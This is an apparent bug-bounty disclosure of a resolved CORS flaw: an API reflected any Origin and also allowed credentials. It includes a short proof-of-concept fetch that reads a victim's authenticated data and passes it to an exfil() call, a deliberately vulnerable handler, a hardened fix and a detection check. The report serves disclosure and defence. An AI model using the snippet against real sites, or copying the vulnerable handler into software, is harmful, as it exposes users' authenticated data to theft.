CORS Private Program 2024-11-01
CORS Misconfiguration Allows Credential Theft
Severity: High | Status: Resolved
Summary
The API echoed any value of the request's Origin header back in Access-Control-Allow-Origin while also sending Access-Control-Allow-Credentials: true, so a browser on any origin was permitted to make credentialed requests and read the responses.
Proof of Concept
// Issued from a page on an attacker-controlled origin; because the API reflects that
// origin and allows credentials, the browser attaches the victim's session cookies
// and the page is allowed to read the JSON response.
fetch('https://api.target.com/user/data', {
  credentials: 'include'
}).then(r => r.json()).then(d => exfil(d));
Impact
Any site a logged-in user visits could read that user's authenticated API responses cross-site, i.e. theft of authenticated user data.
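The reflection described in the Summary, shown next to a hardened allow-list handler and the response check a tester or scanner would apply, as an added example that is not code from the report or the vendor; the origin names are assumed placeholders.

```javascript
// Added example (not from the report). The origins below are assumed placeholders.
const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com',
]);

// Vulnerable pattern: echoes whatever Origin the browser sent and also allows
// credentials, so any origin can make authenticated reads of the API.
function vulnerableCorsHeaders(requestOrigin) {
  if (!requestOrigin) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened form: only an exact match against the fixed allow-list is echoed
// (so the string "null" and look-alike hosts are rejected), and Vary: Origin
// stops a shared cache from serving one origin's answer to another.
function hardenedCorsHeaders(requestOrigin) {
  if (!requestOrigin || !ALLOWED_ORIGINS.has(requestOrigin)) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Detection rule for a probe request whose Origin is one the API should not
// trust: the response is misconfigured when that exact Origin comes back in
// Allow-Origin together with Allow-Credentials: true.
function isCredentialedReflection(probeOrigin, responseHeaders) {
  const acao = responseHeaders['Access-Control-Allow-Origin'];
  const acac = responseHeaders['Access-Control-Allow-Credentials'];
  return acao === probeOrigin && String(acac).toLowerCase() === 'true';
}
```

Run the check against a response to a request carrying an Origin you control but the API has no reason to trust; a match means the same data the report describes is readable cross-site.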
Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.